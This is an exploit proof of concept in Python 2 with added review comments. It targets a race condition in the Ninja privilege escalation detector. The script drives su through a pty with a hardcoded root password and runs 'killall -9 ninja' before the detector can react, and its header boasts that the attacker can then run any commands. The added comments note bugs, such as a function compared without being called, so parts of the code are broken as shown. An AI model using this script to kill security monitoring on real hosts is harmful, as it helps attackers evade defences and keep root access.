#[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[URL] http://highjack.github.io/
#[Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
import pty, os, sys, subprocess
# NOTE(review): pty.fork() runs at import time, before the "config" below is
# assigned; both the child (pid == 0) and the parent (pid > 0, holding the
# master side as `fd`) keep executing the rest of this module. The two
# branches only diverge inside kill_ninja().
pid, fd = pty.fork()
#begin config
# Account handed to `su` by the child (see kill_ninja).
user = "root"
# Written to the pty by the parent after a single read from it. This is a
# hardcoded credential: anyone who can read this file can read it.
password = "mypassword"  #change this :)
# Run via `su -c`; "ninja" is the detector named in the header.
command = "killall -9 ninja"
#end config
def usage():
    """Print the ASCII banner and the header description (Python 2 `print`).

    The banner text below is kept exactly as it appears in the extracted
    listing; its original column layout and line breaks were not preserved.
    It is only printed, nothing reads it back.
    """
    print """
@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@
@@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@
@@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@
!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!!
@!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@!
!!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!!
!!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!!
:!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:!
:: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: :::
: : : : :: :: : : : : : ::: : : : :: :: : : :::
[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition
[Author] Ben
'highjack'
Sheppard
[URL] http:
//highjack.github.io/
[Description] There
is
a small delay between the time of execution of a command and the time privelege escalation
is
detected.
It
is
therefore possible to use a pty to run a command such
as
su and provide the password faster than it can be detected.
The following PoC becomes root
using
su and issues killall -9 ninja. The attacker can then run any commands that they wish.
"""
# Detection counter: read by check_procs() and incremented in the main loop at
# the bottom of the file.
executions = 0
def check_procs():
    """Return True if `ps aux | grep root | grep /sbin/ninja` prints anything.

    Reads the module-level `executions` counter: when output is found and the
    counter is already non-zero, the process exits (sys.exit(0)) instead of
    returning. Written for Python 2 -- communicate() returns str there, which
    is what the `!= ""` comparison assumes (under Python 3 it would return
    bytes and the comparison would always be True).
    """
    p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
    p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE)
    p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
    # NOTE(review): p1.stdout / p2.stdout are never closed in this process and
    # p1 / p2 are never explicitly waited on; only p3 is collected here. The
    # `grep /sbin/ninja` process itself appears in `ps aux` output and could
    # match if its line also contains "root" -- confirm before relying on this.
    output = p3.communicate()[0]
    if output != "":
        if executions != 0:
            sys.exit(0)
        # NOTE(review): the indentation of this `return` is not recoverable
        # from the extracted text; placed after sys.exit() inside the inner
        # branch it would be unreachable, so it is shown one level out.
        return True
    else:
        return False
def kill_ninja():
    """Drive the pty created at import: child execs su, parent types the password.

    Child (pid == 0): replaces itself with `su <user> -c <command>` and never
    returns. Parent (pid > 0): one read on the pty master, a write of
    `password` plus newline, one more read, os.wait(), then closes `fd`. Any
    exception in that sequence (bare except, so an OSError from an already
    closed `fd` on a repeat call is included) prints the banner and the
    "terminated" message and exits 0. Nothing here checks that su actually
    succeeded or that the command ran.

    Defender note: the whole sequence is meant to complete inside the
    detector's polling interval (see the header); closing that window is the
    detector's job, this script only exploits its existence.
    """
    if pid == 0:
        os.execvp("su", ["su", user, "-c", command])
    elif pid > 0:
        try:
            os.read(fd, 1024)
            os.write(fd, password + "\n")
            os.read(fd,1024)
            os.wait()
            # After this close, a second call in the parent raises on the
            # first os.read() above and lands in the handler below.
            os.close(fd)
        except:
            # NOTE(review): how many of these three statements belong to the
            # handler is not recoverable from the extracted text; all three
            # are shown inside it.
            usage()
            print "[+] Ninja is terminated"
            sys.exit(0)
# Main loop (module level, reached by both fork branches; the child execs away
# inside the first kill_ninja() call).
while True:
    kill_ninja()
    # NOTE(review): `check_procs` is compared to True without being called, so
    # this tests the function object itself and is always False; `executions`
    # is never incremented and the second kill_ninja() below never runs. In
    # the parent the loop therefore re-enters kill_ninja() with `fd` already
    # closed and leaves through that function's except handler.
    if (check_procs == True):
        executions = executions + 1
        kill_ninja()